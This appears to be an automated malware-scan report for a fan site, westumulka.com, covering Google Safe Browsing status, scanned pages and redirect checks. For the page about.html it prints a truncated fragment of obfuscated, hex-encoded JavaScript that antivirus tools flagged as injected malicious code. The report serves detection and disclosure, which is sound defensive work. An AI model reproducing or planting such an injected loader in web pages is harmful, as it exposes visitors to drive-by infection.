Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=westumulka.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://westumulka.com/ | 200 OK Content-Length: 19323 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.comicbooks.westumulka.com <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta name="description" content="The main portal to websites and pages I maintain"> <meta name="Keywords" content="Darkman, Doc Savage, Outer Limits, Rawhide, Supreme, Shadow, The Spirit, Police Squad, DC Archives, Master Man, Zagor, Spirit, The Shadow"> <meta name="Author" content="Wes Tumulka"> <LIN ...[4735 bytes skipped]... | ||
http://westumulka.com/about.html | 200 OK Content-Length: 9091 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ejgqqi="spl"+"i"+"t";bwmqgn=window;yxo="0"+"x";bprip=(5-3-1);try{--(document["body"])}catch(vrpm){xay=false;try{}catch(qydan){xay=21;}if(1){sqd="17:5d:6c:65:5a:6b:60:66:65:17:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64: ...[3900 bytes skipped]... Antivirus reports:
| ||
http://westumulka.com/index.html | 200 OK Content-Length: 19323 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.comicbooks.westumulka.com <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta name="description" content="The main portal to websites and pages I maintain"> <meta name="Keywords" content="Darkman, Doc Savage, Outer Limits, Rawhide, Supreme, Shadow, The Spirit, Police Squad, DC Archives, Master Man, Zagor, Spirit, The Shadow"> <meta name="Author" content="Wes Tumulka"> <LIN ...[4735 bytes skipped]... | ||
http://westumulka.com/test404page.js | 404 Not Found Content-Length: 2018 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.comicbooks.westumulka.com ...[238 bytes skipped]... ><meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <title>404 error page</title> </head> <body bgcolor="#FFFFFF"> <table border="1" cellpadding="4" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" cellspacing="3"> <tr> <td width="33%" align="center"><font face="Arial" size="4"> <a href="http://www.comicbooks.westumulka.com/">COMIC BOOKS</a></font><p> <font face="Arial" size="4"><a href="http://www.movies.westumulka.com/"> MOVIES</a></font></p> <p> <font face="Arial" size="4"><a href="http://www.pulps.westumulka.com/">PULPS</a></font></p> <p><font face="Arial" size="4"><a href="http://www.shop.westumulka.com/"> SHOP</a></font></p> ...[1481 bytes skipped]... | ||
http://westumulka.com/indexb.html | 404 Not Found Content-Length: 2015 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.comicbooks.westumulka.com ...[238 bytes skipped]... ><meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <title>404 error page</title> </head> <body bgcolor="#FFFFFF"> <table border="1" cellpadding="4" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" cellspacing="3"> <tr> <td width="33%" align="center"><font face="Arial" size="4"> <a href="http://www.comicbooks.westumulka.com/">COMIC BOOKS</a></font><p> <font face="Arial" size="4"><a href="http://www.movies.westumulka.com/"> MOVIES</a></font></p> <p> <font face="Arial" size="4"><a href="http://www.pulps.westumulka.com/">PULPS</a></font></p> <p><font face="Arial" size="4"><a href="http://www.shop.westumulka.com/"> SHOP</a></font></p> ...[1478 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: westumulka.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 09:23:24 GMT
Accept-Ranges: bytes
ETag: "1aa09db-4b7b-4e672caec8100"
Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.29
Content-Length: 19323
Content-Type: text/html
Last-Modified: Sun, 15 Sep 2013 21:30:12 GMT
...19323 bytes of data.
GET / HTTP/1.1
Host: westumulka.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 09:23:24 GMT
Accept-Ranges: bytes
ETag: "1aa09db-4b7b-4e672caec8100"
Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.29
Content-Length: 19323
Content-Type: text/html
Last-Modified: Sun, 15 Sep 2013 21:30:12 GMT
...19323 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: westumulka.com
Referer: http://www.google.com/search?q=westumulka.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: westumulka.com
Referer: http://www.google.com/search?q=westumulka.com
Result:
The result is similar to the first query. There are no suspicious redirects found.